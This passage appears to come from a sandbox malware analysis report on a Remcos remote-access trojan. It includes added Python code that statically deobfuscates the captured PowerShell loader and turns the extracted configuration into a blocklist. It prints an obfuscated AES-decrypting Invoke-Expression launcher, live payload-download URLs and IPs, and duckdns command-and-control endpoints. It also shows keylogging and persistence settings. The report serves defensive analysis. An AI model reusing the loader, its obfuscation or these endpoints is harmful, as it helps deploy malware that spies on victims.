'+'CnI/cGJmqVj5jCchNUuqniccRhpmR5qMkJqyaxLjAOoZS+I6UjjzBuHKkMUIawH3bTvDj7nWJq1X++W/D0YbGXb8mznv8QaOqQP1S2jB+yDre2mYNc51z88VDp5yhLxv2jub4BAD5MQkn09gj7sFrzKiS0Lv4bbd7SWdBlNNY01HOPdZZi88uLKrHF094fRfKbDTWl6drqxh86PYBPPz5p2Ly9NFsVGPk0kub6u6Kg9MbD3UxusVGZCdUc0aq5EXDqvPaek1WSrhMDfsWP03fZTtbxI2uIb73uc20hNa8tKlWpVgQcg5yXgT1Syt4JsFjugZ9Qtq1uX/OG7aRAuR2SPi44P27EfktJtInMKpDXYHkjZS52YqNTFAu7vkn80WLfrjaKO1puSNI83KG4Gb5VMO0L0qfDKNvusZUr6nwSAndn5NEdU4kRRcVNX137D+ZBob0WbqlGLDBY6a+EMGzYtzcJ9yDU9sRHuvpnJ5c0hkwPy4DW2nC9xKyXClHpMrOAGz59KK909AdcVa3cZMI4okN0iylLC6wphikPk+n/lH8dSrmPfxXmnyxHQ6FPMQ3t7W6XvHMIHBTNK1roZfwexEEon7dKRDC0d2IrLWlyM+aSkJSwieqOUXpMZyJUm2hcsj8O2qQ6SJSSECSO9pH7mC3RTLzx/Yu4I0g+aMXaEbo7jnGZCzrsoXBRasrE5huijlM3SPVHWt7BmPHFNB5UAtl1Poeor3payTIoDvmHLQ5udJKwLQ55FOeaNJf+pmojioT+Punj9PkhiGcH6xTdE+2IrxNPE7ay7Vlrz0F+zzhORfur8P5pHWq383QgBA8DubDwQoW+2/zvvGy0+vtBVpAZBtMhKqsSHtY4fy3hgqLxKhWAneQJQ8WqLkzqUVDY9EPZtjGeMds6via1iXp+weIOrC5nUhoaj4yGoY2MoXMyeOduTv3614RUxvqvvcerqLinXXajm5YyY2gVFXVy7lQs/l3ppDJ/Er9yz3s9rYpNCLl0sEExFChP/0AEE9hA3qtQqm07KfQM7Fm/TxVhAZZQIl8WYJ4sl9VdVuOvk82qKlTC24fpX5MYkZQF4iy2oZu7+PswZNBWNr+R8IbeXGpk6YULjJIQEn49p7IIebLL4A+J83MoPUBcLr/3wfiOdRztCS5fsI1/7gWW61aBZmh9WQ5Y/PN8qrPMJKYzSp84UIHHxGLfpUuclLTYd6067KhaUF+isNYUo0YQamdLvdcnsAnB1fFVG2Z6opzbG7sqFu6AQguz584NTtWuBMlcl43XDc/g09jFmr9jk22MvT+6/1kqeSuax5g4j6g6n3MjeEp9CvY3LOjh+/KWuQr/Kbqc4JIBZhwkTcrNn4Yi2/MmJ/0v3oIfVqNNecpNoQxXyyJjgkG+362VFqQj/+ROnzXepvq3WcWkQ/CheHAW5Iw==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
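To read the two PowerShell stages flagged by the Sigma rules above without running them, the following is an added example written for this report (it is neither Joe Sandbox's nor the malware author's code) that undoes both obfuscation layers in Python. The first stage is a chain of quoted pieces joined with '+', with the sentinels e4j, AQM, CnI and TMI standing in for the quote, the pipe, the double quote ([char]67,110,73 -> [char]34) and the dollar sign ([char]36). The captured command line stops before the outer -replace that restores e4j and AQM, so that part of the mapping is an assumption, chosen because it is the only one that turns the text into valid PowerShell. The restored script is an AES-256-CBC decryptor with PaddingMode.Zeros whose key is SHA256 of the literal $chave and whose IV is the first 16 bytes of the base64 blob (the variable names are Portuguese: chave is key, texto criptografado is encrypted text). In the second stage, Svndyssendes94 keeps every character at an odd index of each literal and discards the rest before Scance() pipes the result into iex. Two caveats: the report's HTML rendering collapsed runs of spaces inside several literals (the User-Agent and the echo %appdata% ones, for instance), which flips the parity and garbles the decode from that point on, so the excerpt below only uses literals whose spacing survived; and the AES step needs the third-party cryptography package, so it is left as a function to call on the blob from the Sigma hit. All function and constant names are the example's own.

```python
"""Static deobfuscation of the two PowerShell stages captured in the Sigma hits
(added example; not part of the Joe Sandbox report or the sample)."""
import base64
import hashlib
import re

# ---- Stage 1: the "-command (('((e4jfunction Decrypt-AESEncryption ..." launcher ----
# The captured command is a chain of single-quoted pieces joined with '+'.  Once those
# are joined, the launcher maps the sentinel e4j back to a quote (which re-creates a
# second layer of '+' joins) and AQM back to a pipe; the inner -replace / -creplace then
# map CnI -> " and TMI -> $ before Invoke-Expression.
# Assumption: the outer -replace for e4j/AQM is cut off in the captured command line;
# ' and | are the only values that make the result valid PowerShell.

def deobfuscate_stage1(captured: str) -> str:
    text = captured.replace("'+'", "")                     # join the outer pieces
    text = text.replace("e4j", "'").replace("AQM", "|")    # undo the sentinels
    text = text.replace("'+'", "")                         # join the pieces that re-appeared
    return text.replace("CnI", '"').replace("TMI", "$")    # the inner -replace / -creplace

# Beginning of the captured command line, copied from the Sigma hit above.
STAGE1_FRAGMENT = (
    "function Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)"
    "TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;"
    "TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy."
    "e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = "
    "[System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;"
    "TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j "
    "System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8."
    "Gee4j+e4jtBytes(TMIKey));"
)

STAGE1_KEY = "98685860701936162316809131591218"   # $chave, the key string literal in the script
SAMPLE_BLOB = base64.b64encode(bytes(range(48))).decode()   # constructed stand-in for the real blob

def stage1_key_iv_ct(key_str: str, b64_blob: str):
    """Mirror Decrypt-AESEncryption: AES-256 key = SHA256(UTF-8 key string), IV = first 16
    bytes of the decoded blob, ciphertext = the remainder (CBC, PaddingMode.Zeros)."""
    data = base64.b64decode(b64_blob)
    if len(data) < 32 or len(data) % 16:
        raise ValueError("blob must be an IV followed by whole AES blocks")
    return hashlib.sha256(key_str.encode("utf-8")).digest(), data[:16], data[16:]

def decrypt_stage1_payload(key_str: str, b64_blob: str) -> str:
    """Recover the text the script hands to Invoke-Expression (needs the cryptography package)."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    key, iv, ct = stage1_key_iv_ct(key_str, b64_blob)
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    plain = dec.update(ct) + dec.finalize()
    return plain.decode("utf-8", errors="replace").strip("\x00")   # .Trim([char]0) in the script

# ---- Stage 2: the "cls;write 'Revisoratets207 ...'" downloader ----
# Svndyssendes94 sets $Digers to 1 and walks i = 1, 3, 5, ... while i < Length-1,
# appending Substring(i, 1): the characters at odd indexes are real, the rest are junk.

def decode_interleaved(literal: str) -> str:
    return "".join(literal[i] for i in range(1, len(literal) - 1, 2))

ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*Svndyssendes94 '([^']*)'")

def decode_stage2_assignments(script: str) -> dict:
    """Map each $variable assigned from Svndyssendes94 to its decoded value."""
    return {name: decode_interleaved(lit) for name, lit in ASSIGN_RE.findall(script)}

# Four assignments copied from the Sigma hit above; only literals whose spacing survived
# the report's HTML rendering are included (see the note in the text).
STAGE2_EXCERPT = (
    "$slotting=Svndyssendes94 '.UTsUe r.-FA g ern,ti ';"
    "$Udvandringerne=Svndyssendes94 ' h tTtjpAsA: /E/KaPs,oDc.i aRt i.a t r.aLd,i tGi.i m aArSi a...r o,/GoLs /,t r aDn.s.p o.rbtEm e,nNt...pAfPmM> hSt t pHs,:P/ /,n.e.w ..qCuPr aLnGu s hbaEi qGe r . oerFg..,s a./ wMpc- a.d m.iKnD/ToNs,e rCvDe /Rtdr,a nps.pro.r.tSm.e n tG. pHfTmI ';"
    "$Fluffs=Svndyssendes94 'S> ';"
    "$Gederamsen=Svndyssendes94 'Pi,e x ';"
)

def stage2_download_urls(script: str) -> list:
    """The script splits $Udvandringerne on the decoded $Fluffs and tries each URL in turn
    until Test-Path on the dropped file succeeds."""
    v = decode_stage2_assignments(script)
    return v["Udvandringerne"].split(v["Fluffs"])

if __name__ == "__main__":
    print(deobfuscate_stage1(STAGE1_FRAGMENT))
    for url in stage2_download_urls(STAGE2_EXCERPT):
        print("stage-2 download URL:", url)
```

Run it as is to see the readable decryptor and the two download URLs; to recover the stage-2 script itself, pass the full base64 blob from the Sigma hit to decrypt_stage1_payload(STAGE1_KEY, blob) on an analysis machine with the cryptography package installed, and never feed the output to an interpreter.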
                  No Snort rule has matched
                  IDS alerts, in time order (only ports are listed here; 57484 is the C2 port of the Remcos configuration extracted below):
                  Timestamp                        SID      Source Port  Destination Port  Protocol  Classtype
                  2024-07-27T13:31:00.255775+0200  2047750  80           49704             TCP       A Network Trojan was detected
                  2024-07-27T13:31:01.367604+0200  2049038  80           49704             TCP       A Network Trojan was detected
                  2024-07-27T13:31:02.365590+0200  2020424  80           49705             TCP       Exploit Kit Activity Detected
                  2024-07-27T13:31:03.293177+0200  2032776  49706        57484             TCP       Malware Command and Control Activity Detected
                  2024-07-27T13:31:04.851966+0200  2032777  57484        49706             TCP       Malware Command and Control Activity Detected
                  2024-07-27T13:31:06.094770+0200  2803304  49709        80                TCP       Unknown Traffic
                  2024-07-27T13:31:16.345911+0200  2022930  443          49712             TCP       A Network Trojan was detected
                  2024-07-27T13:31:17.499992+0200  2012510  443          49711             TCP       Potentially Bad Traffic
                  2024-07-27T13:31:24.608086+0200  2803305  49719        443               TCP       Unknown Traffic
                  2024-07-27T13:31:24.727754+0200  2012510  443          49719             TCP       Potentially Bad Traffic
                  2024-07-27T13:31:54.656391+0200  2022930  443          49721             TCP       A Network Trojan was detected
                  2024-07-27T13:33:08.503059+0200  2032777  57484        49706             TCP       Malware Command and Control Activity Detected

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm | Avira URL Cloud: Label: malware
                  Source: https://asociatiatraditiimaria.ro/os/transportment.pfm | Avira URL Cloud: Label: malware
                  Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm0 | Avira URL Cloud: Label: malware
                  Source: iwarsut775laudrye2.duckdns.org | Avira URL Cloud: Label: malware
                  Source: http://198.46.176.133/Upload/vbs.jpeg | Avira URL Cloud: Label: malware
                  Source: https://new.quranushaiqer.org.sa | Avira URL Cloud: Label: malware
                  Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfml | Avira URL Cloud: Label: malware
                  Source: http://104.168.45.34/59/LMTS.txt | Avira URL Cloud: Label: malware
                  Source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos
                  {
                    "Host:Port:Password": "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0",
                    "Assigned name": "MAGIC",
                    "Connect interval": "1",
                    "Install flag": "Disable",
                    "Setup HKCU\\Run": "Enable",
                    "Setup HKLM\\Run": "Enable",
                    "Install path": "Application path",
                    "Copy file": "remcos.exe",
                    "Startup value": "Enable",
                    "Hide file": "Disable",
                    "Mutex": "shietgtst-A57Q98",
                    "Keylog flag": "1",
                    "Keylog path": "AppData",
                    "Keylog file": "sfvnspt.dat",
                    "Keylog crypt": "Disable",
                    "Hide keylog file": "Enable",
                    "Screenshot flag": "Disable",
                    "Screenshot time": "10",
                    "Take Screenshot option": "Disable",
                    "Take screenshot title": "",
                    "Take screenshot time": "5",
                    "Screenshot path": "AppData",
                    "Screenshot file": "Screenshots",
                    "Screenshot crypt": "Disable",
                    "Mouse option": "Disable",
                    "Delete file": "Disable",
                    "Audio record time": "5"
                  }
                  Source: asociatiatraditiimaria.ro | Virustotal: Detection: 14%
                  Source: iwarsut775laudrye2.duckdns.org | Virustotal: Detection: 19%
                  Source: new.quranushaiqer.org.sa | Virustotal: Detection: 17%
                  Source: https://asociatiatraditiimaria.ro/feed/ | Virustotal: Detection: 13%
                  Source: https://new.quranushaiqer.org.sa/wp-admin/oserve/transportment.pfm | Virustotal: Detection: 17%
                  Source: https://asociatiatraditiimaria.ro/wp-content/uploads/elementor/css/post-2731.css?ver=1720763767 | Virustotal: Detection: 13%
                  Source: http://198.46.176.133 | Virustotal: Detection: 13%
                  Source: https://asociatiatraditiimaria.ro/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1 | Virustotal: Detection: 13%
                  Source: https://asociatiatraditiimaria.ro/wp-content/plugins/elementor/assets/css/frontend-lite.min.css?ver= | Virustotal: Detection: 13%
                  Source: https://asociatiatraditiimaria.ro | Virustotal: Detection: 5%
                  Source: http://198.46.176.133/Upload/vbs.jpeg | Virustotal: Detection: 19%
                  Source: https://asociatiatraditiimaria.ro/comments/feed/ | Virustotal: Detection: 13%
                  Source: https://asociatiatraditiimaria.ro/wp-json/ | Virustotal: Detection: 13%
                  Source: https://asociatiatraditiimaria.ro/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.7.2 | Virustotal: Detection: 13%
                  Source: createdthingstobefrankwithmeeverywhere.gIF.vbs | Virustotal: Detection: 18%
                  Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000004.00000002.3265268792.0000000000F66000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR
                  Source: Yara match | File source: C:\Users\user\AppData\Roaming\sfvnspt.dat, type: DROPPED
                  Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_00433837
                  Source: powershell.exe, 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_bcd06fae-d
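The Remcos configuration above carries four C2 endpoints whose separators did not survive into the report, and the IDS alerts show traffic on port 57484. As an added example (not part of the report), the Python below splits the Host:Port:Password field back into entries, derives a blocklist from them, and marks which IDS alerts sit on a configured C2 port. The alert list is constructed from the alerts shown in this report; the one-character password is an assumption about how the entries were joined, supported by the bare host iwarsut775laudrye2.duckdns.org appearing in the Avira and VirusTotal rows; and the port-only join is a deliberate simplification because the report shows no IP columns. Function and constant names are the example's own.

```python
"""Turn the extracted Remcos configuration into C2 indicators and check them against the
IDS alerts of this analysis (added example; not part of the Joe Sandbox report)."""
import re

# "Host:Port:Password" exactly as the configuration extractor printed it.  The separator
# between the four entries was lost, so they run together.  Assumption: each entry is
# <host>:<port>:<password> with a one-character password; that is the split under which
# the bare host iwarsut775laudrye2.duckdns.org flagged elsewhere in the report falls out.
REMCOS_HOST_FIELD = (
    "iwarsut775laudrye2.duckdns.org:57484:0iwarsut775laudrye2.duckdns.org:57483:1"
    "iwarsut775laudrye3.duckdns.org:57484:0hjnourt38haoust1.duckdns.org:57484:0"
)

ENTRY_RE = re.compile(r"([A-Za-z0-9.-]+):(\d{1,5}):(\d)")

def parse_c2_entries(host_field: str):
    """Return [(host, port, password), ...] in configuration order."""
    return [(h, int(p), pw) for h, p, pw in ENTRY_RE.findall(host_field)]

# The IDS alerts from this report, reduced to the fields it shows
# (timestamp, SID, source port, destination port, classtype); constructed from that list.
IDS_ALERTS = [
    ("2024-07-27T13:31:00.255775+0200", 2047750, 80, 49704, "A Network Trojan was detected"),
    ("2024-07-27T13:31:01.367604+0200", 2049038, 80, 49704, "A Network Trojan was detected"),
    ("2024-07-27T13:31:02.365590+0200", 2020424, 80, 49705, "Exploit Kit Activity Detected"),
    ("2024-07-27T13:31:03.293177+0200", 2032776, 49706, 57484, "Malware Command and Control Activity Detected"),
    ("2024-07-27T13:31:04.851966+0200", 2032777, 57484, 49706, "Malware Command and Control Activity Detected"),
    ("2024-07-27T13:31:06.094770+0200", 2803304, 49709, 80, "Unknown Traffic"),
    ("2024-07-27T13:31:16.345911+0200", 2022930, 443, 49712, "A Network Trojan was detected"),
    ("2024-07-27T13:31:17.499992+0200", 2012510, 443, 49711, "Potentially Bad Traffic"),
    ("2024-07-27T13:31:24.608086+0200", 2803305, 49719, 443, "Unknown Traffic"),
    ("2024-07-27T13:31:24.727754+0200", 2012510, 443, 49719, "Potentially Bad Traffic"),
    ("2024-07-27T13:31:54.656391+0200", 2022930, 443, 49721, "A Network Trojan was detected"),
    ("2024-07-27T13:33:08.503059+0200", 2032777, 57484, 49706, "Malware Command and Control Activity Detected"),
]

def c2_ports(entries):
    return {port for _, port, _ in entries}

def alerts_on_c2_ports(alerts, entries):
    """Alerts whose source or destination port is one the implant is configured to use.
    The report lists no addresses, so this is a port-only join: enough to pick out the
    check-in and the server replies, not a substitute for matching on the resolved C2 IP."""
    ports = c2_ports(entries)
    return [a for a in alerts if a[2] in ports or a[3] in ports]

def blocklist(entries):
    """One host:port line per distinct endpoint, in first-seen order."""
    seen, out = set(), []
    for host, port, _ in entries:
        if (host, port) not in seen:
            seen.add((host, port))
            out.append(f"{host}:{port}")
    return out

if __name__ == "__main__":
    entries = parse_c2_entries(REMCOS_HOST_FIELD)
    print("C2 endpoints:", *blocklist(entries), sep="\n  ")
    for ts, sid, sport, dport, cls in alerts_on_c2_ports(IDS_ALERTS, entries):
        print(ts, sid, f"{sport}->{dport}", cls)
```

The three alerts this picks out are the check-in from the sandbox's ephemeral port 49706 to 57484 and the two server replies on the same connection; the remaining alerts belong to the HTTP and HTTPS stages that fetch the payload and are not tied to the implant's configured ports.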

                  Exploits

                  barindex
                  Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.powershell.exe.1b1e29723d0.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.powershell.exe.1b1e29723d0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2109299164.000001B1E188F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.2109299164.000001B1E269C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: powershell.exe PID: 4432, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 5684, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 4_2_004074FD _wcslen,CoGetObject,4_2_004074FD (CoGetObject on an elevation moniker is the call behind the "bypass UAC (CMSTPLUA)" signature in the overview)
                  Source: unknown | HTTPS traffic detected: 93.113.54.56:443 -> 192.168.2.5:49711 version: TLS 1.2
                  Source: unknown | HTTPS traffic detected: 34.166.62.190:443 -> 192.168.2.5:49720 version: TLS 1.2
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000002.00000002.2168518859.000001B1E9DA0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000002.00000002.2109299164.000001B1E18F3000.00000004.00000800.00020000.00000000.sdmp
